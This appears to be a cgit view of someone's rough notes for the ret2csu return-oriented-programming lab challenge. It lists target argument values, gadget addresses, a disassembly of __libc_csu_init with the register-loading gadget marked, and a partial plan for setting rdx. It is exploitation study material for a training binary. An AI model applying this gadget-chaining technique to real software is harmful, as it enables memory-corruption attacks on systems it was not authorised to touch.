summaryrefslogtreecommitdiff
path: root/x86_64/ret2csu/gadgets
blob: f3adc78205e36c6e7359eb1b014a078a6d250c72 (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88

First three arguments: 
rdi   0xdeadbeefdeadbeef
rsi   0xcafebabecafebabe
rdx   0xd00df00dd00df00d


weird-ass instructions:
0x0000000000000a08 : retf 0xbabe


ret2win@plt: 0000000000400510

0x00000000004006a3 : pop rdi ; ret 
0x00000000004006a1 : pop rsi ; pop r15 ; ret 




ret2csu:     file format elf64-x86-64


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

0000000000400640 <__libc_csu_init>:
  400640: 41 57                 push   r15
  400642: 41 56                 push   r14
  400644: 49 89 d7              mov    r15,rdx
  400647: 41 55                 push   r13
  400649: 41 54                 push   r12
  40064b: 4c 8d 25 9e 07 20 00  lea    r12,[rip+0x20079e]        # 600df0 <__frame_dummy_init_array_entry>
  400652: 55                    push   rbp
  400653: 48 8d 2d 9e 07 20 00  lea    rbp,[rip+0x20079e]        # 600df8 <__do_global_dtors_aux_fini_array_entry>
  40065a: 53                    push   rbx
  40065b: 41 89 fd              mov    r13d,edi
  40065e: 49 89 f6              mov    r14,rsi
  400661: 4c 29 e5              sub    rbp,r12
  400664: 48 83 ec 08           sub    rsp,0x8
  400668: 48 c1 fd 03           sar    rbp,0x3
  40066c: e8 5f fe ff ff        call   4004d0 <_init>
  400671: 48 85 ed              test   rbp,rbp
  400674: 74 20                 je     400696 <__libc_csu_init+0x56>
  400676: 31 db                 xor    ebx,ebx
  400678: 0f 1f 84 00 00 00 00  nop    DWORD PTR [rax+rax*1+0x0]
  40067f: 00 
 _______this shit is importaint!!!!!!
\/
  400680: 4c 89 fa              mov    rdx,r15
  400683: 4c 89 f6              mov    rsi,r14
  400686: 44 89 ef              mov    edi,r13d
  400689: 41 ff 14 dc           call   QWORD PTR [r12+rbx*8]
_________________________
  40068d: 48 83 c3 01           add    rbx,0x1
  400691: 48 39 dd              cmp    rbp,rbx
  400694: 75 ea                 jne    400680 <__libc_csu_init+0x40> 
  400696: 48 83 c4 08           add    rsp,0x8                       
_________________________
  40069a: 5b                    pop    rbx
  40069b: 5d                    pop    rbp
  40069c: 41 5c                 pop    r12
  40069e: 41 5d                 pop    r13
  4006a0: 41 5e                 pop    r14
  4006a2: 41 5f                 pop    r15
  4006a4: c3                    ret    

Disassembly of section .fini:

calling x86: 

controlling rdx: 

2: 0x40069a
  rbx: 0                          <--
  rbp: 1
  r12: 0xffffffff                 <-- next location. lets try to make it 
  r13: whatever I guess           <-- would be nice if we could use a 64 bit value
  r14: 0xcafebabecafebabe                 
  r15: 0xd00df00dd00df00d         <--

we can set r12 to [function@plt], and rbx to desired offset.

0x00000000004004e0 : call rax

target address: 0x00000000004006a3 
0000000000400510 ret2csu
generated by cgit v1.2.3 (git 2.39.1) at 2024-09-21 07:49:13 +0000